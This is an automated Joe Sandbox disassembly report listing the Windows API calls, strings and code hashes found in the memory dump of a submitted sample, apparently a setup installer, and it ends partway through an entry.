                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              • Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                              • Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
                                                                              • Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
                                                                              • Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
                                                                              APIs
                                                                              • GetMenu.USER32(00000000), ref: 00421371
                                                                              • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                              • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                              • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu
                                                                              • String ID:
                                                                              • API String ID: 3711407533-0
                                                                              • Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                              • Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
                                                                              • Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
                                                                              • Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D
                                                                              APIs
                                                                              • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                              • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Color$CallMessageProcSendTextWindow
                                                                              • String ID:
                                                                              • API String ID: 601730667-0
                                                                              • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                              • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                              • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                              • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                              APIs
                                                                              • WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                              • CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                              • String ID:
                                                                              • API String ID: 4071923889-0
                                                                              • Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                              • Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
                                                                              • Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
                                                                              • Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                              • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                              • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                              • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A24620A480A570EnumFonts
                                                                              • String ID:
                                                                              • API String ID: 2630238358-0
                                                                              • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                              • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                              • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                              • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                              APIs
                                                                                • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                              • FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
                                                                              Strings
                                                                              • EndOffset range exceeded, xrefs: 0045BAED
                                                                              • NumRecs range exceeded, xrefs: 0045BAB6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: File$BuffersFlush
                                                                              • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                              • API String ID: 3593489403-659731555
                                                                              • Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                              • Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
                                                                              • Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
                                                                              • Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54
                                                                              APIs
                                                                                • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
                                                                                • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
                                                                                • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                • Part of subcall function 00409B88: 6F551CD0.COMCTL32(0049708E), ref: 00409B88
                                                                                • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
                                                                                • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
                                                                                • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                                • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                                • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
                                                                              • SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
                                                                                • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                              • ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
                                                                                • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                              • String ID: Setup
                                                                              • API String ID: 3870281231-3839654196
                                                                              • Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                              • Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
                                                                              • Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
                                                                              • Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                              • 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A25940CurrentThread
                                                                              • String ID: RzE
                                                                              • API String ID: 2655091166-1126107055
                                                                              • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                              • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                              • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                              • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: RegisteredOrganization$RegisteredOwner
                                                                              • API String ID: 3535843008-1113070880
                                                                              • Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                              • Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
                                                                              • Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
                                                                              • Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateErrorFileHandleLast
                                                                              • String ID: CreateFile
                                                                              • API String ID: 2528220319-823142352
                                                                              • Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                              • Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
                                                                              • Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
                                                                              • Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618
                                                                              APIs
                                                                                • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                                • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                              • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                              • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                              • API String ID: 2906209438-2320870614
                                                                              • Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                              • Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
                                                                              • Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                              • Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E
                                                                              APIs
                                                                                • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                              • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorLibraryLoadModeProc
                                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                              • API String ID: 2492108670-2683653824
                                                                              • Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                              • Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
                                                                              • Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                              • Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE
                                                                              APIs
                                                                              • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Append$System
                                                                              • String ID:
                                                                              • API String ID: 1489644407-0
                                                                              • Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                              • Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
                                                                              • Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                              • Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
                                                                              • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                              • 73A1A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A480A570ObjectSelect
                                                                              • String ID:
                                                                              • API String ID: 1230475511-0
                                                                              • Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                              • Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
                                                                              • Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                              • Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
                                                                              • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                              • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
